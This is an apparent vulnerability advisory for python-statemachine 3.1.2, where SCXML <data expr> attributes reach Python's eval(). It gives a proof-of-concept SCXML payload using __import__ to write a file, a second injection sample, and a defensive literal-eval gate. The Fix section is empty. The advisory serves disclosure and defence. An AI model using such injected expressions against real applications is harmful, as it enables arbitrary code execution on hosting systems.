PT-2026-53579 · Pypi · Python-Statemachine

Published

2026-06-29

·

Updated

2026-06-29

CVSS v3.1

9.8

Critical

Vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

python-statemachine 3.1.2 evaluates <data expr="..."> attributes in SCXML documents using Python's eval(). Any application that passes attacker-controlled SCXML content to SCXMLProcessor is vulnerable to arbitrary code execution in the context of the hosting process.

Details

SCXMLProcessor.parse_scxml_file() processes SCXML documents and evaluates the expr attribute of <data> elements via the following call chain (underscores restored from the extraction-damaged original):
SCXMLProcessor.parse_scxml_file()
  SCXMLProcessor.process_definition()
    create_datamodel_action_callable()
      create_dataitem_callable()
        _eval()
          eval()
_eval() calls Python's built-in eval() directly on the expression string, without sandboxing or restriction.

PoC

1. Install:
  pip install python-statemachine==3.1.2

2. Create an SCXML file containing:
  <data id="x" expr="__import__('pathlib').Path('marker.txt').write_text('pwned')"/>

3. Run:
  SCXMLProcessor.parse_scxml_file(DATA_EXPR_CHART)
  SCXMLProcessor.start()

4. During start(), the <data expr> value reaches _eval(), which calls eval().

5. Result:
  data marker before start: False
  data marker after start: True
  success: True

Impact

This is an eval injection vulnerability (CWE-95). It yields remote or local code execution, depending on whether the consuming application accepts SCXML content from remote users, uploaded files, configuration, plugins, or other untrusted sources.
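As an added example (not part of the advisory and not python-statemachine's own code), the following gate lets a consuming application reject an SCXML document whose <data expr="..."> values are anything other than plain Python literals before the document ever reaches SCXMLProcessor. The element names follow the SCXML namespace; the sample documents are constructed for this example.

```python
import ast
import xml.etree.ElementTree as ET

SCXML_NS = "{http://www.w3.org/2005/07/scxml}"


def find_unsafe_exprs(scxml_text: str) -> list[str]:
    """Return the <data expr="..."> values that are not plain Python literals.

    In python-statemachine 3.1.2 a data expression reaches eval(), so the
    only expressions a consumer should accept are ones ast.literal_eval()
    can parse (numbers, strings, lists, dicts, ...). Names, calls, attribute
    access and dunder imports are reported as unsafe.
    """
    root = ET.fromstring(scxml_text)
    unsafe = []
    # handle both namespaced and un-namespaced <data> elements
    for tag in (SCXML_NS + "data", "data"):
        for elem in root.iter(tag):
            expr = elem.get("expr")
            if expr is None:
                continue
            try:
                ast.literal_eval(expr)
            except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
                unsafe.append(f"{elem.get('id', '?')}: {expr}")
    return unsafe


def is_safe_scxml(scxml_text: str) -> bool:
    """True only when every <data expr> in the document is a literal."""
    return not find_unsafe_exprs(scxml_text)


# Constructed sample documents for this example (not from the advisory)
SAFE_DOC = """<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="s0">
  <datamodel>
    <data id="count" expr="0"/>
    <data id="tags" expr="['a', 'b']"/>
  </datamodel>
  <state id="s0"/>
</scxml>"""

UNSAFE_DOC = """<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="s0">
  <datamodel>
    <data id="x" expr="__import__('os').getcwd()"/>
  </datamodel>
  <state id="s0"/>
</scxml>"""
```

This gate covers only the <data expr> path the advisory describes; the robust fix is to never hand untrusted SCXML to SCXMLProcessor at all.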

Fix


Related identifiers

PYSEC-2026-506

Affected products

Python-Statemachine